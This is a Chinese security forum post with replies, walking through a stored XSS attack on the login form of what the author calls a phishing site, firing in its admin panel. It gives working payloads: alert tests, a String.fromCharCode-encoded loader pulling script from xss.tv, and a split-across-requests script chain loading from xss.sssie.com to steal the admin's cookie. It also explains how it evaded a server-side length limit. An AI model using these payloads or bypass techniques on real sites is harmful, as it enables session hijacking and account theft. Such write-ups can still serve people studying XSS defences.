用户
搜索
  • TA的每日心情
    开心
    2017-11-26 07:05
  • 签到天数: 322 天

    连续签到: 1 天

    [LV.8]以坛为家I

    i春秋作家

    春秋闷骚男

    Rank: 7Rank: 7Rank: 7

    31

    主题

    441

    帖子

    1722

    魔法币
    收听
    0
    粉丝
    17
    注册时间
    2016-7-21

    i春秋签约作者

    发表于 2017-8-5 20:39:17 231323993
    本帖最后由 风在指尖 于 2017-10-4 00:23 编辑


    本文原创,如需转载,请联系i春秋坏蛋。
    上次有人向我反映,我讲的过于快了,不适合菜鸟看,所以这次我写的相对来说比较详细
    ~ 这对于有基础的人来说可能比较煎熬,哈哈。大家秒懂的部分可以跳过~~


    这次的比较简单,
    对一个目标网站进行白盒测试,
    图片1.png

    这是后台
    图片2.png



    可以看到,这边是一个钓鱼网站

    对目标进行XSS白盒测试

    点击领取礼包,这里会弹出一个登录框

    图片3.png

    我们随便输入一个账户密码
    通过抓包修改里面的参数
    图片4.png


    目测,这里就两个参数可以测试, 一个user 一个password
    放上自己最常用的payload password 内  
    [AppleScript] 纯文本查看 复制代码
    user=123123112312&password=123123"><img/src=1 onerror=alert("1">//&submit=%E7%99%BB%E5%BD%95
    "> 是闭合标签<img/src=1 onerror=alert("1"> 是弹窗//为注释掉后面的语法
    现在我们进入后台查看,
    图片5.png


    可以看到,很明显的,我们的img标签已经执行成功了,但是没有弹窗,这是为啥?
    对其右击-查看源码
    图片6.png

    查看他的属性,我们发现,alert后面的语句没有执行? 那么,我们换个标签试试

    再次请求数据


    [AppleScript] 纯文本查看 复制代码
    user=123123112312&password=123123"><style/onload=alert(1)>//&submit=%E7%99%BB%E5%BD%95
    图片7.png

    这次进到后台查看
    图片8.png


    可以看到,这边已经成功弹窗了

    然后就应该开始构造payload ~走起,引用我的XSS站点URL 构造的payload 应该为

    [AppleScript] 纯文本查看 复制代码
     
    
    “><img/src=1/>//


    红色的”>部分为闭合前边的标签黄色的// 为注释掉后面的语句<img/src=1/>  这句代码主要就是引用我们XSS平台的代码,主要达到一个盗取对方cookie的效果

    图片9.png


    然后我们再一次提交数据
    图片10.png


    password 参数里,也就是密码处添加payload

    图片11.png


    结果后台数据没有显示


    凭着经验判断,可能是对某个字符进行了过滤,但是我自己也不知道是哪个,所以只能不断的测试 payload编码试试



    那么使用String.fromCharCode 函数进行转换吧~~什么是String.fromCharCode函数转换呢?打个比方~ 我们把alert("1") 进行转换

    图片12.png


    那么我们在 标签输入试试

    图片13.png


    在页面上显示弹窗

    图片14.png


    那么我构造的payload 就应该为

    [AppleScript] 纯文本查看 复制代码
    "><svg/onload=eval((String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,118,47,88,65,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59)))>//
    再次请求数据,把这段payload 放到 password 参数里

    图片15.png


    然后我们进入后台查看

    图片16.png



    好像,应该,或许成功了吧,我们查看源码试试

    图片17.png



    不行, 后来我又试了上百种payload,最终发现,这货是在服务器端限制了字符数。。。。。。。。。。。。。。。 也就是说,我们用最短的payload 弹窗可以,但是如果需要引用 自己恶意站点的URL,就需要大量的代码,这样的话就根本的防止了我们构造~

    还好,我之前看过 剑心的 跨站拆分法  (在这里为他默哀3~

    何为跨站拆分?简单理解,就是一大块蛋糕放不进去冰箱,我们把它切成一小块一小块的放进去

    例子
    图片18.png


    你们自己在脚本里输入看看,最终的效果是什么



    好的,现在我们做一个最简单的测试

    图片19.png


    给变量a赋值为0;然后弹出变量a

    图片20.png



    现在我们把代码一一的放入进入 输入账号密码,抓包修改

    图片21.png


    在后台查看下, 图片22.png


    成功保存



    输入账号密码,抓包修改

    图片23.png




    输入完,第二段代码,让着两段叠加,那么他们就应该弹窗了吧~

    图片24.png


    现在来开始构造我们的站点吧~~

    [AppleScript] 纯文本查看 复制代码
    <script>z='document'</script>
    
    <script>z=z+'.write("'</script>
    
    <script>z=z+'<script'</script>
    
    <script>z=z+' src=ht'</script>
    
    <script>z=z+'tp://xss'</script>
    
    <script>z=z+'.sssie'</script>
    
    <script>z=z+'.com/F'</script>
    
    <script>z=z+'MD27h'</script>
    
    <script>z=z+'></sc'</script>
    
    <script>z=z+'ript>")'</script>
    
    <script>alert(z)</script>
    
    <script>eval(z)</script>




    逐个放进去即可 然后就拿到了对方的cookie



    我把我在一个论坛里的XSS教程买了下来,我看了下,由易到难,不知道对大家有没有帮助
    XSS高级实战教程--心伤的瘦子.zip (4.04 MB, 下载次数: 506, 售价: 10 魔法币)

    评分

    参与人数 2魔法币 +8 收起 理由
    pandaMan + 5 感谢你的分享,i春秋论坛有你更精彩!.
    机械鸥 + 3 感谢你的分享,i春秋论坛有你更精彩!.

    查看全部评分

    本帖被以下淘专辑推荐:

    xss  交流群602221356  接收XSS爱好者
    阿甫哥哥 管理员 i春秋最帅男神-阿甫大哥哥 楚 核心白帽 i春秋签约作者 白帽传说 春秋游侠 秦 燕 魏
    来自 144#
    发表于 2017-8-17 22:21:55
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!
    奖金
    点评
    100
    一些xss的技巧运用的很好,感谢分享


    Time will give me the answer
    使用道具 举报 回复
    发表于 2017-10-29 06:54:52
    黯然销魂者 发表于 2017-10-28 15:20
    为什么第一次测试      少了个圆括号 。
    到了下面 为啥会变成尖括号

    没听明白你什么意思
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-8-17 22:22:31
    阿甫哥哥 发表于 2017-8-17 14:21
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

    ...

    耶耶耶~~~
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    为什么第一次测试<img/src=1 onerror=alert("1">      少了个圆括号 。
    到了下面 为啥会变成尖括号
    使用道具 举报 回复
    发表于 2017-8-10 10:19:04
    异类test 发表于 2017-8-10 02:14
    这个站的源码能发出来测试一下吗

    没有源码,很久以前写的文章, 最近才发布出来,
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-8-7 21:20:40
    Aze_176 发表于 2017-8-7 12:49
    打这种钓鱼站 用的比较多的就是xss了? 还是说其他方法

    sql注入也可以
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-8-5 21:29:07
    思路很好,学习了
    使用道具 举报 回复
    不错,学习一波
    使用道具 举报 回复
    发表于 2017-8-6 12:31:39
    哈哈,可以看看
    使用道具 举报 回复
    发表于 2017-8-7 14:18:31
    感谢分享
    使用道具 举报 回复
    学习了.............................................
    使用道具 举报 回复
    发表于 2017-8-7 15:43:27
    666666666感谢分享
    使用道具 举报 回复
    学习学习了
    使用道具 举报 回复
    发表于 2017-8-7 15:46:44
    学习一波
    使用道具 举报 回复
    发表于 2017-8-7 16:03:35
    dfasfasfasfasfasfas
    使用道具 举报 回复
    发表于 2017-8-7 16:11:18
    感谢分享
    使用道具 举报 回复
    666厉害啊
    使用道具 举报 回复
    发表于 2017-8-7 16:59:24
    厉害i 好 谢谢
    使用道具 举报 回复
    很吊的一个思路
    使用道具 举报 回复
    发表于 2017-8-7 17:31:06
    挺好的,学习了,大佬。谢谢你
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册